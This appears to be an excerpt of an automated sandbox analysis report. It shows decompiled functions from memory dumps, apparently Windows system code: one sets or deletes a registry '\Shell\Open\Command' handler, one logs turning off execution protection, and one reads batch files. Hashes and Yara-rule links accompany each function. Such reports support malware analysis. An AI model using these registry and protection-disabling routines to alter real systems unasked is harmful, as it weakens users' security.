Instruction Fuzzy Hash: EDB1257A909249EFDB30DFA8C880ADDBBB1FF04355F12446AE905EB651D730AE49CB50

Uniqueness

Uniqueness Score: -1.00%

Function 4A74DB5E, Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 185
registryCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E4A74DB5E(void* _a4, intOrPtr* _a8, int _a12) {
				signed int _v8;
				short _v528;
				intOrPtr* _v532;
				void* _v536;
				int _v540;
				void* _v544;
				long _v548;
				signed int _v552;
				int _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t42;
				intOrPtr* _t45;
				signed int _t48;
				signed short* _t59;
				int _t62;
				int _t71;
				long _t78;
				signed short _t80;
				intOrPtr _t86;
				char* _t87;
				void* _t93;
				void* _t96;
				char _t97;
				int _t99;
				char* _t100;
				signed short* _t102;
				signed int _t105;

				_t42 =  *0x4a7540ac; // 0xbb40e64e
				_v8 = _t42 ^ _t105;
				_v544 = _a4;
				_t45 = _a8;
				_v532 = _t45;
				_v540 = _a12;
				_t96 = _t45 + 2;
				do {
					_t86 =  *_t45;
					_t45 = _t45 + 2;
				} while (_t86 != 0);
				_t87 = L"\\Shell\\Open\\Command";
				_t48 = _t45 - _t96 >> 1;
				_t100 =  &(_t87[2]);
				do {
					_t97 =  *_t87;
					_t87 =  &(_t87[2]);
				} while (_t97 != 0);
				_t90 = _t87 - _t100 >> 1;
				if((_t87 - _t100 >> 1) + _t48 + 1 <= 0x104) {
					E4A73185A( &_v528, 0x104, _v532);
					E4A7320A9(0x104,  &_v528, 0x104, L"\\Shell\\Open\\Command");
					_t99 = 0x2000000;
					_t102 = RegOpenKeyExW(_v544,  &_v528, 0, 0x2000000,  &_v536);
					if(_t102 == 0) {
						L18:
						_t99 = _v540;
						if(_t99 == 0 ||  *_t99 == 0) {
							_t102 = RegDeleteValueW(_v536, 0);
							if(_t102 != 0) {
								E4A736D44(_t90, 0x400023a5, 1, _v532);
								goto L27;
							}
						} else {
							_t62 = _t99;
							_t97 = _t62 + 2;
							do {
								_t93 =  *_t62;
								_t62 = _t62 + 2;
							} while (_t93 != 0);
							_t102 = RegSetValueExW(_v536, E4A733AFC, 0, 2, _t99, (_t62 - _t97 >> 1) + (_t62 - _t97 >> 1) + 2);
							if(_t102 != 0) {
								_push(0);
								_push(_t102);
								E4A736D44(_t93);
								E4A736D44(_t93, 0x235d, 1, _v532);
							} else {
								_push(_t99);
								E4A7358F3(L"%s=%s\r\n", _v532);
								L27:
							}
						}
						RegCloseKey(_v536);
						goto L29;
					} else {
						_t71 = _v540;
						if(_t71 == 0 ||  *_t71 == 0) {
							E4A736D44(_t90, 0x400023a5, 1, _v532);
							L29:
							_t59 = _t102;
						} else {
							_t102 =  &_v528;
							L12:
							while(1) {
								while( *_t102 != 0) {
									if( *_t102 != 0x5c) {
										_t102 =  &(_t102[1]);
										continue;
									}
									break;
								}
								_v552 =  *_t102 & 0x0000ffff;
								 *_t102 = 0;
								_t78 = RegCreateKeyExW(_v544,  &_v528, 0, 0, 0, _t99, 0,  &_v536,  &_v556);
								_v548 = _t78;
								if(_t78 != 0) {
									E4A736D44(_t90, 0x400023a5, 1, _v532);
									_t59 = _v548;
								} else {
									_t80 = _v552;
									if(_t80 == 0) {
										goto L18;
									} else {
										 *_t102 = _t80;
										_t102 =  &(_t102[1]);
										RegCloseKey(_v536);
										continue;
									}
								}
								goto L30;
							}
						}
					}
				} else {
					_push(0);
					_push(0x400023db);
					E4A736D44(_t90);
					_t59 = 1;
				}
				L30:
				return E4A7313A9(_t59, 0, _v8 ^ _t105, _t97, _t99, _t102);
			}

0x4a74db69
0x4a74db70
0x4a74db7a
0x4a74db80
0x4a74db85
0x4a74db8b
0x4a74db91
0x4a74db96
0x4a74db96
0x4a74db9a
0x4a74db9b
0x4a74dba7
0x4a74dba9
0x4a74dbab
0x4a74dbae
0x4a74dbae
0x4a74dbb2
0x4a74dbb3
0x4a74dbba
0x4a74dbc7
0x4a74dbec
0x4a74dbfa
0x4a74dc06
0x4a74dc20
0x4a74dc24
0x4a74dcec
0x4a74dcec
0x4a74dcf4
0x4a74dd6c
0x4a74dd70
0x4a74dd7f
0x00000000
0x4a74dd7f
0x4a74dcfb
0x4a74dcfb
0x4a74dcfd
0x4a74dd00
0x4a74dd00
0x4a74dd04
0x4a74dd05
0x4a74dd28
0x4a74dd2c
0x4a74dd41
0x4a74dd42
0x4a74dd43
0x4a74dd55
0x4a74dd2e
0x4a74dd2e
0x4a74dd3a
0x4a74dd84
0x4a74dd84
0x4a74dd2c
0x4a74dd8d
0x00000000
0x4a74dc2a
0x4a74dc2a
0x4a74dc32
0x4a74dcdf
0x4a74dd93
0x4a74dd93
0x4a74dc41
0x4a74dc41
0x00000000
0x4a74dc51
0x4a74dc51
0x4a74dc4d
0x4a74dc50
0x00000000
0x4a74dc50
0x00000000
0x4a74dc4d
0x4a74dc59
0x4a74dc61
0x4a74dc84
0x4a74dc8a
0x4a74dc92
0x4a74dcbf
0x4a74dcc4
0x4a74dc94
0x4a74dc94
0x4a74dc9d
0x00000000
0x4a74dc9f
0x4a74dca5
0x4a74dca9
0x4a74dcaa
0x00000000
0x4a74dcaa
0x4a74dc9d
0x00000000
0x4a74dc92
0x4a74dc51
0x4a74dc32
0x4a74dbc9
0x4a74dbc9
0x4a74dbca
0x4a74dbcf
0x4a74dbd8
0x4a74dbd8
0x4a74dd95
0x4a74dda3

APIs

RegOpenKeyExW.KERNEL32 ref: 4A74DC1A
RegCreateKeyExW.KERNEL32(?,?,00000000,00000000,00000000,02000000,00000000,?,?), ref: 4A74DC84
RegCloseKey.KERNEL32(?), ref: 4A74DCAA
RegSetValueExW.KERNEL32 ref: 4A74DD22
RegDeleteValueW.KERNEL32 ref: 4A74DD66
RegCloseKey.KERNEL32(?), ref: 4A74DD8D

Strings

%s=%s, xrefs: 4A74DD35
\Shell\Open\Command, xrefs: 4A74DBA0, 4A74DBF1

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: CloseValue$CreateDeleteOpen
String ID: %s=%s$\Shell\Open\Command
API String ID: 4081037667-3301834661
Opcode ID: e96f8c201bdb7c1c27ae0e1608cbfbe6c0b129faf82d0e0ba87b38151e2c8d43
Instruction ID: c663ff58791dcc5e7254199019741911604ee2a8617304a36947bd3e020d8423
Opcode Fuzzy Hash: e96f8c201bdb7c1c27ae0e1608cbfbe6c0b129faf82d0e0ba87b38151e2c8d43
Instruction Fuzzy Hash: BD51B772904129BFDF31AF54CC8CEEA7BB9EB49300F1244D9E689A7142D6718E89CF50

Uniqueness

Uniqueness Score: -1.00%

Function 02387EFD, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 127
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E02387EFD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				unsigned int _v544;
				signed int _v548;
				intOrPtr _v552;
				char _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t38;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t52;
				intOrPtr _t56;
				unsigned int _t62;
				void* _t69;
				void* _t70;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t33 =  *0x2432088; // 0x76b1a062
				_v8 = _t33 ^ _t73;
				_v548 = _v548 & 0x00000000;
				_t72 = _a4;
				if(E02387F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
					__eflags = _v548;
					if(_v548 == 0) {
						goto L1;
					}
					_t62 = _t72 + 0x24;
					E023A3F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
					_t71 = 0x214;
					_v544 = 0x214;
					E0235DFC0( &_v540, 0, 0x214);
					_t75 = _t74 + 0x20;
					_t46 =  *0x2434218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L1;
					}
					_t47 = _v544;
					__eflags = _t47;
					if(_t47 == 0) {
						goto L1;
					}
					__eflags = _t47 - 0x214;
					if(_t47 >= 0x214) {
						goto L1;
					}
					_push(_t62);
					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
					E023A3F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
					_t52 = E02360D27( &_v540, L"Execute=1");
					_t76 = _t75 + 0x1c;
					_push(_t62);
					__eflags = _t52;
					if(_t52 == 0) {
						E023A3F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
						_t71 =  &_v540;
						_t56 = _t73 + _v544 - 0x218;
						_t77 = _t76 + 0x14;
						_v552 = _t56;
						__eflags = _t71 - _t56;
						if(_t71 >= _t56) {
							goto L1;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t62 = E02368375(_t71, 0x20);
							_pop(_t69);
							__eflags = _t62;
							if(__eflags != 0) {
								__eflags = 0;
								 *_t62 = 0;
							}
							E023A3F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
							_t77 = _t77 + 0x10;
							E023CE8DB(_t69, _t70, __eflags, _t72, _t71);
							__eflags = _t62;
							if(_t62 == 0) {
								goto L1;
							}
							_t31 = _t62 + 2; // 0x2
							_t71 = _t31;
							__eflags = _t71 - _v552;
							if(_t71 >= _v552) {
								goto L1;
							}
						}
					}
					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
					_push(3);
					_push(0x55);
					E023A3F92();
					_t38 = 1;
					L2:
					return E0235E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
				}
				L1:
				_t38 = 0;
				goto L2;
			}

0x02387f08
0x02387f0f
0x02387f12
0x02387f1b
0x02387f31
0x023a3ead
0x023a3eb4
0x00000000
0x00000000
0x023a3eba
0x023a3ecd
0x023a3ed2
0x023a3ee1
0x023a3ee7
0x023a3eec
0x023a3f12
0x023a3f18
0x023a3f1a
0x00000000
0x00000000
0x023a3f20
0x023a3f26
0x023a3f28
0x00000000
0x00000000
0x023a3f2e
0x023a3f30
0x00000000
0x00000000
0x023a3f3a
0x023a3f3b
0x023a3f53
0x023a3f64
0x023a3f69
0x023a3f6c
0x023a3f6d
0x023a3f6f
0x023ae304
0x023ae30f
0x023ae315
0x023ae31e
0x023ae321
0x023ae327
0x023ae329
0x00000000
0x00000000
0x00000000
0x00000000
0x023ae32f
0x023ae32f
0x023ae337
0x023ae33a
0x023ae33b
0x023ae33d
0x023ae33f
0x023ae341
0x023ae341
0x023ae34e
0x023ae353
0x023ae358
0x023ae35d
0x023ae35f
0x00000000
0x00000000
0x023ae365
0x023ae365
0x023ae368
0x023ae36e
0x00000000
0x00000000
0x023ae374
0x023ae32f
0x023a3f75
0x023a3f7a
0x023a3f7c
0x023a3f7e
0x023a3f86
0x02387f39
0x02387f47
0x02387f47
0x02387f37
0x02387f37
0x00000000

APIs

BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 023A3F12

Strings

CLIENT(ntdll): Processing section info %ws..., xrefs: 023AE345
Execute=1, xrefs: 023A3F5E
ExecuteOptions, xrefs: 023A3F04
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 023A3F75
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 023A3F4A
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 023AE2FB
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 023A3EC4

Memory Dump Source

Source File: 00000007.00000002.685565082.0000000002340000.00000040.00000001.sdmp, Offset: 02330000, based on PE: true

Associated: 00000007.00000002.685502431.0000000002330000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.685850131.0000000002420000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.685861725.0000000002430000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.685875850.0000000002434000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.685886803.0000000002437000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.685914274.0000000002440000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.686000770.00000000024A0000.00000040.00000001.sdmp Download File

Similarity

API ID: BaseDataModuleQuery
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 3901378454-484625025
Opcode ID: 269396f5dfcab413ab374e39929c959886cf9aae6ad4a8b5cb2fb4b243cff57d
Instruction ID: f8b412bf4b29e58913eb961f6c48abbb73d2215a427369297d0c6f79c91d3738
Opcode Fuzzy Hash: 269396f5dfcab413ab374e39929c959886cf9aae6ad4a8b5cb2fb4b243cff57d
Instruction Fuzzy Hash: 0E41D83268031C7AEB30EA94DCD9FEBB3BDAB54704F1444A9E909E6081E770DA458F61

Uniqueness

Uniqueness Score: -1.00%

Function 4A731A1A, Relevance: 13.8, APIs: 9, Instructions: 310
COMMON

Download Yara Rule

C-Code - Quality: 39%

			E4A731A1A(void* __ecx, void* __eflags) {
				signed int _v8;
				long _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t46;
				intOrPtr _t48;
				signed int _t51;
				intOrPtr* _t54;
				intOrPtr _t60;
				void* _t61;
				signed int _t62;
				signed int _t66;
				signed int _t67;
				signed int _t68;
				intOrPtr* _t70;
				intOrPtr* _t74;
				signed int _t78;
				void* _t80;
				void* _t83;
				signed int _t85;
				signed int _t92;
				short _t94;
				long _t95;
				signed int _t96;
				signed int* _t97;
				void* _t98;
				long _t100;
				signed int _t101;
				signed int* _t104;
				signed int _t105;
				long _t106;
				signed int _t108;
				signed int _t111;
				signed int _t112;
				intOrPtr _t115;
				void* _t116;
				void* _t119;
				void* _t122;
				void* _t124;
				short* _t125;
				short* _t133;
				short _t134;
				intOrPtr* _t135;
				void* _t140;
				void* _t141;
				void* _t142;
				void* _t146;
				void* _t157;

				_push(__ecx);
				_push(__ecx);
				_push(_t108);
				_push(_t130);
				E4A731E6C(_t46);
				_t48 =  *0x4a754194; // 0x0
				_t111 =  *0x4a7541a0; // 0x0
				 *0x4a76c640 =  *((intOrPtr*)(_t48 - 2));
				_t51 = _t111 & 0x00000003;
				if(_t51 == 1) {
					 *0x4a770642 = 0;
					E4A73185A(0x4a76c642, 0x2002,  *0x4a75419c);
					_t54 = 0x4a76c642;
					_t18 = _t54 + 2; // 0x4a76c644
					_t122 = _t18;
					_t108 = 0;
					__eflags = 0;
					goto L25;
					L23:
					 *0x4a754194 = 0x4a76c642;
					E4A731EC6(_t108, _t111, 0x4a76c642, _t130);
					_t60 =  *0x4a754194; // 0x0
					 *0x4a754190 = _t60;
					return _t60;
					L25:
					_t112 =  *_t54;
					_t54 = _t54 + 2;
					__eflags = _t112;
					if(_t112 != 0) {
						goto L25;
					} else {
						_t111 =  *0x4a75419c; // 0x0
						 *0x4a75419c = _t111 + (_t54 - _t122 >> 1) * 2;
						goto L23;
					}
				}
				_t2 = _t51 - 2; // -2
				_t123 = _t2;
				if(_t2 > 1) {
					goto L23;
				}
				_t108 = 0;
				if(_t51 == 2) {
					L36:
					__eflags = 0x00008000 & _t111;
					if(__eflags != 0) {
						_push(_t108);
						_t51 = E4A7399E1(_t111);
						_t111 = 0x2352;
					} else {
						_t51 = E4A73C60C(_t108, _t123, 0x4a76c642, 0x8000, __eflags);
						 *0x4a7541a0 =  *0x4a7541a0 | 0x00008000;
					}
					L4:
					_t61 = E4A731E6C(_t51);
					_t133 = 0x4a75c640;
					_t141 =  *0x4a75419c - _t108; // 0x0
					if(_t141 == 0) {
						_t62 = E4A736BEA(_t61, _t108);
						__eflags = _t62;
						if(_t62 != 0) {
							L46:
							_v8 = _t108;
							while(1) {
								__imp___get_osfhandle( &_v12);
								_t66 = E4A734D9A(0x4a75c640 + _v8 * 2,  *0x4a75419c, 0x4a75c640 + _v8 * 2, 1);
								__eflags = _t66;
								if(_t66 != 0) {
									goto L49;
								}
								_t95 = GetLastError();
								__eflags = _t95 - 0xea;
								if(_t95 != 0xea) {
									L9:
									_t68 =  *0x4a75419c; // 0x0
									if(_v8 == _t108) {
										__eflags = _t68 - _t108;
										if(_t68 != _t108) {
											goto L10;
										}
										_t92 = E4A733B03(_t68, _t111, _t108);
										__eflags = _t92;
										if(_t92 != 0) {
											__eflags =  *0x4a77066c - _t108; // 0x0
											if(__eflags == 0) {
												goto L29;
											}
											_v8 = _v8 + 1;
											_t94 = 0xa;
											 *0x4a75c640 = _t94;
											L13:
											E4A734B3D(0x4a76c642, 0x2002, _t133, _v8);
											_t70 = 0x4a76c642;
											_t9 = _t70 + 2; // 0x4a76c644
											_t124 = _t9;
											goto L14;
											do {
												L16:
												_t123 =  *_t74;
												_t74 = _t74 + 2;
											} while (_t123 != _t108);
											_t130 = _t74 - _t116 >> 1;
											_t78 = E4A731996(0x4a76c642, E4A731BBC);
											_t111 = _v8;
											_v12 = _t78;
											if(_t78 >= _t74 - _t116 >> 1) {
												__eflags = _t111 - _t108;
												if(_t111 == _t108) {
													goto L18;
												}
												__eflags = _t78 - 0x2000;
												if(_t78 < 0x2000) {
													goto L23;
												}
												__eflags =  *0x4a754174 - 3;
												_t133 = 0x233f;
												L69:
												if(__eflags == 0) {
													__eflags =  *0x4a75408c - 1;
													if(__eflags == 0) {
														E4A73C60C(_t108, _t123, 0x4a76c642, _t133, __eflags);
														E4A7358F3();
														 *_t135 = 0x4a7545a8;
														E4A7358F3();
														_t111 = 0x4a76c642;
													}
													_push(_t108);
													E4A736D44(_t111);
													_t111 = _t133;
													E4A74FCA6(_t108, _t111, _t123, 0x4a76c642, _t133);
												}
												_push(_t108);
												_t83 = E4A736D44(_t111);
												_t119 = _t133;
												__eflags =  *0x4a75419c - _t108; // 0x0
												if(__eflags == 0) {
													_t85 = E4A733B03(_t83, _t119, _t108);
													__eflags = _t85;
													if(_t85 != 0) {
														E4A750175(_t108, _t123);
													}
												}
												L61:
												__imp__longjmp(0x4a754ac0, 0xffffffff);
												L62:
												E4A7358F3();
												_pop(_t111);
												L8:
												_v12 = _t108;
												goto L9;
											}
											L18:
											_t125 = 0x4a76c642 + _t78 * 2;
											if( *_t125 == 0x1a) {
												_t134 = 0xa;
												 *_t125 = _t134;
											}
											if( *_t125 != 0xa) {
												_t130 = 0;
												_v12 = 2;
											} else {
												_t125 = _t125 + 2;
												_t130 = _t111;
												_v12 = 1;
											}
											 *_t125 = 0;
											_t80 = E4A733B03(0, _t111,  *0x4a75419c);
											if(_t80 == 0) {
												_t130 =  ~_t130;
												__imp___get_osfhandle( *0x4a75419c, _t130, _t108, _v12);
												_pop(_t111);
												SetFilePointer(_t80, ??, ??, ??);
												_t157 =  *0x4a75419c - _t108; // 0x0
												if(_t157 == 0) {
													__eflags =  *0x4a7706ac - _t108; // 0x0
													if(__eflags == 0) {
														E4A73C5A0(0x4a76c642);
													}
												}
											}
											goto L23;
											L14:
											_t115 =  *_t70;
											_t70 = _t70 + 2;
											if(_t115 != _t108) {
												goto L14;
											} else {
												_v8 = _t70 - _t124 >> 1;
												_t74 = 0x4a76c642;
												_t11 = _t74 + 2; // 0x4a76c644
												_t116 = _t11;
												goto L16;
											}
										}
										L29:
										_push(2);
										E4A743787(_t111, 0x4a76c642, _t133);
										goto L69;
									}
									L10:
									_t146 =  *0x4a77066c - _t108; // 0x0
									if(_t146 == 0 && _v8 != _t108 && _t68 == _t108) {
										 *0x4a77066c = 1;
									}
									goto L13;
								}
								L49:
								__eflags = _v12 - _t108;
								if(_v12 != _t108) {
									_v8 = _v8 + 1;
									_t67 = _v8;
									__eflags =  *((short*)(0x4a75c63e + _t67 * 2)) - 0xa;
									if( *((short*)(0x4a75c63e + _t67 * 2)) != 0xa) {
										__eflags = _t67 - 0x2000;
										if(_t67 >= 0x2000) {
											goto L9;
										}
										continue;
									}
									goto L9;
								}
								goto L9;
							}
						}
						_t96 = E4A733B03(_t62, _t111, _t108);
						__eflags = _t96;
						if(_t96 == 0) {
							L41:
							__eflags =  *0x4a75419c - _t108; // 0x0
							if(__eflags != 0) {
								goto L5;
							}
							_t101 = E4A733B03(_t96, _t111, _t108);
							__eflags = _t101;
							if(_t101 == 0) {
								goto L5;
							}
							__eflags =  *0x4a754154 & 0x00000001;
							if(( *0x4a754154 & 0x00000001) == 0) {
								goto L5;
							}
							__eflags =  *0x4a7706bc - _t108; // 0x0
							if(__eflags != 0) {
								_t100 = E4A74E87B( &_v8,  *0x4a75419c, _t133, 0x2000,  &_v8);
								L34:
								_v12 = _t100;
								goto L9;
							}
							E4A731E6C(_t101);
							_t104 =  &_v8;
							__imp___get_osfhandle( *0x4a75419c, _t133, 0x2000, _t104);
							_pop(_t111);
							_push(_t104);
							_t105 = E4A7434E2();
							__eflags = _t105;
							if(_t105 == 0) {
								L33:
								_v8 = _t108;
								_t100 = GetLastError();
								goto L34;
							} else {
								__eflags = _v8 - _t108;
								if(_v8 != _t108) {
									goto L8;
								}
								_t106 = GetLastError();
								_push(0x4a7545a8);
								__eflags = _t106 - 0x3e3;
								if(_t106 != 0x3e3) {
									goto L62;
								}
								E4A7358F3();
								goto L61;
							}
							goto L46;
						}
						__eflags =  *0x4a754154 & 0x00000001;
						if(( *0x4a754154 & 0x00000001) == 0) {
							goto L46;
						}
						goto L41;
					}
					L5:
					_t97 =  &_v8;
					__imp___get_osfhandle( *0x4a75419c, _t133, 0x2000, _t97);
					_pop(_t111);
					_push(_t97);
					_t98 = E4A734D9A();
					_t142 =  *0x4a7541b4 - _t108; // 0x0
					if(_t142 != 0) {
						E4A731E6C(_t98);
						goto L61;
					}
					if(_t98 == _t108 || _v8 <= _t108) {
						goto L33;
					} else {
						goto L8;
					}
				}
				_t140 =  *0x4a75419c - _t108; // 0x0
				if(_t140 == 0) {
					goto L36;
				}
				goto L4;
			}

0x4a731a1f
0x4a731a20
0x4a731a21
0x4a731a22
0x4a731a24
0x4a731a29
0x4a731a32
0x4a731a38
0x4a731a40
0x4a731a4b
0x4a732dd1
0x4a732dd7
0x4a732ddc
0x4a732dde
0x4a732dde
0x4a732de1
0x4a732de1
0x4a732de1
0x4a731ba1
0x4a731ba1
0x4a731ba7
0x4a731bac
0x4a731bb3
0x4a731bba
0x4a732de3
0x4a732de3
0x4a732de7
0x4a732de8
0x4a732deb
0x00000000
0x4a732ded
0x4a732ded
0x4a732dfa
0x00000000
0x4a732dfa
0x4a732deb
0x4a731a51
0x4a731a51
0x4a731a57
0x00000000
0x00000000
0x4a731a5d
0x4a731a62
0x4a74342b
0x4a743430
0x4a743432
0x4a74362e
0x4a743634
0x4a74363a
0x4a743438
0x4a743438
0x4a74343d
0x4a74343d
0x4a731a74
0x4a731a74
0x4a731a79
0x4a731a7e
0x4a731a84
0x4a743449
0x4a74344e
0x4a743450
0x4a7435c8
0x4a7435c8
0x4a7435cb
0x4a7435e2
0x4a7435ea
0x4a7435ef
0x4a7435f1
0x00000000
0x00000000
0x4a7435f3
0x4a7435f9
0x4a7435fe
0x4a731ac7
0x4a731ac7
0x4a731acf
0x4a735788
0x4a73578a
0x00000000
0x00000000
0x4a735791
0x4a735796
0x4a735798
0x4a7436b8
0x4a7436be
0x00000000
0x00000000
0x4a7436c4
0x4a7436c9
0x4a7436ca
0x4a731aea
0x4a731af4
0x4a731af9
0x4a731afb
0x4a731afb
0x4a731afb
0x4a731b14
0x4a731b14
0x4a731b14
0x4a731b18
0x4a731b19
0x4a731b28
0x4a731b2a
0x4a731b2f
0x4a731b32
0x4a731b37
0x4a7357aa
0x4a7357ac
0x00000000
0x00000000
0x4a7357b2
0x4a7357b7
0x00000000
0x00000000
0x4a7436e6
0x4a7436ed
0x4a7436f2
0x4a7436f2
0x4a7436f4
0x4a7436fb
0x4a7436fd
0x4a743703
0x4a743708
0x4a74370f
0x4a743714
0x4a743714
0x4a743715
0x4a743717
0x4a74371d
0x4a74371e
0x4a74371e
0x4a743723
0x4a743725
0x4a74372b
0x4a74372c
0x4a743732
0x4a743739
0x4a74373e
0x4a743740
0x4a743746
0x4a743746
0x4a743740
0x4a743699
0x4a7436a0
0x4a7436a6
0x4a7436a6
0x4a7436ab
0x4a731ac4
0x4a731ac4
0x00000000
0x4a731ac4
0x4a731b3d
0x4a731b3d
0x4a731b48
0x4a743752
0x4a743753
0x4a743753
0x4a731b52
0x4a7357d3
0x4a7357d5
0x4a731b58
0x4a731b5b
0x4a731b5d
0x4a731b5f
0x4a731b5f
0x4a731b6e
0x4a731b71
0x4a731b78
0x4a731b7d
0x4a731b87
0x4a731b8d
0x4a731b8f
0x4a731b95
0x4a731b9b
0x4a74375b
0x4a743761
0x4a743768
0x4a743768
0x4a743761
0x4a731b9b
0x00000000
0x4a731afe
0x4a731afe
0x4a731b02
0x4a731b06
0x00000000
0x4a731b08
0x4a731b0c
0x4a731b0f
0x4a731b11
0x4a731b11
0x00000000
0x4a731b11
0x4a731b06
0x4a73579e
0x4a73579e
0x4a7357a0
0x00000000
0x4a7436d5
0x4a731ad5
0x4a731ad5
0x4a731adb
0x4a7436d7
0x4a7436d7
0x00000000
0x4a731adb
0x4a743604
0x4a743604
0x4a743607
0x4a743640
0x4a743643
0x4a743646
0x4a74364f
0x4a74360e
0x4a743613
0x00000000
0x00000000
0x00000000
0x4a743619
0x00000000
0x4a743651
0x00000000
0x4a743609
0x4a7435cb
0x4a743457
0x4a74345c
0x4a74345e
0x4a74346d
0x4a74346d
0x4a743473
0x00000000
0x00000000
0x4a74347a
0x4a74347f
0x4a743481
0x00000000
0x00000000
0x4a743487
0x4a74348e
0x00000000
0x00000000
0x4a743494
0x4a74349a
0x4a743666
0x4a7357cb
0x4a7357cb
0x00000000
0x4a7357cb
0x4a7434a0
0x4a7434a5
0x4a7434b5
0x4a7434bb
0x4a7434bc
0x4a7434bd
0x4a743670
0x4a743672
0x4a7357c2
0x4a7357c2
0x4a7357c5
0x00000000
0x4a743678
0x4a743678
0x4a74367b
0x00000000
0x00000000
0x4a743681
0x4a743687
0x4a74368c
0x4a743691
0x00000000
0x00000000
0x4a743693
0x00000000
0x4a743698
0x00000000
0x4a743672
0x4a743460
0x4a743467
0x00000000
0x00000000
0x00000000
0x4a743467
0x4a731a8a
0x4a731a8a
0x4a731a9a
0x4a731aa0
0x4a731aa1
0x4a731aa2
0x4a731aa7
0x4a731aad
0x4a7436b1
0x00000000
0x4a7436b1
0x4a731ab5
0x00000000
0x00000000
0x00000000
0x00000000
0x4a731ab5
0x4a731a68
0x4a731a6e
0x00000000
0x00000000
0x00000000

APIs

Part of subcall function 4A731E6C: EnterCriticalSection.KERNEL32(4A73851C), ref: 4A731E72
Part of subcall function 4A731E6C: LeaveCriticalSection.KERNEL32(?,4A731DBC,?,00000021,-00000003,4A768640,4A754210,00000000,00000000,?,4A731CE6,4A768640,4A754210,4A754210,?,4A731C8D), ref: 4A731E85

_get_osfhandle.MSVCRT ref: 4A731B87
SetFilePointer.KERNEL32(00000000,4A731DBC,?,00000021,-00000003,4A768640,4A754210,00000000,00000000,?,4A731CE6,4A768640,4A754210,4A754210,?,4A731C8D), ref: 4A731B8F
GetLastError.KERNEL32(00000000,4A731E56,4A731F9D,-00000003,4A754210,4A754210,?,4A731DBC,?,00000021,-00000003,4A768640,4A754210,00000000,00000000), ref: 4A7357C5
_get_osfhandle.MSVCRT ref: 4A731A9A

Part of subcall function 4A734D9A: SetFilePointer.KERNEL32(4A754210,00000000,00000000,00000001,4A76C642,4A75C640,00000000), ref: 4A734DB5
Part of subcall function 4A734D9A: ReadFile.KERNEL32(4A754210,4A756640,00000000,?,00000000), ref: 4A734DDD
Part of subcall function 4A734D9A: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,4A756640,4A754210,00000006,?), ref: 4A734E54

_get_osfhandle.MSVCRT ref: 4A7434B5
GetLastError.KERNEL32(00000000,4A731E56,4A731F9D,-00000003,4A754210,4A754210,?,4A731DBC,?,00000021,-00000003,4A768640,4A754210,00000000,00000000), ref: 4A743681
longjmp.MSVCRT(4A754AC0,000000FF,4A76C642,4A731BBC,4A76C642,00002002,4A75C640,00000000,00000000,4A731E56,4A731F9D,-00000003,4A754210,4A754210,?,4A731DBC), ref: 4A7436A0

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: File_get_osfhandle$CriticalErrorLastPointerSection$ByteCharEnterLeaveMultiReadWidelongjmp
String ID:
API String ID: 3667609627-0
Opcode ID: 14ead1c82f12114f676a43e1aa5c861dc8ac705eaa42eeb0c3e2eb7b3efea718
Instruction ID: eeab2a0484ae9e0fb0a7e2a1060df1aa1a73f9e17404cf0bc66d3f99cf526304
Opcode Fuzzy Hash: 14ead1c82f12114f676a43e1aa5c861dc8ac705eaa42eeb0c3e2eb7b3efea718
Instruction Fuzzy Hash: 03A120B195D612EEEF709FA0CD999EA3FBEEF06351B124026D509CA942E7708D4CCB11

Uniqueness

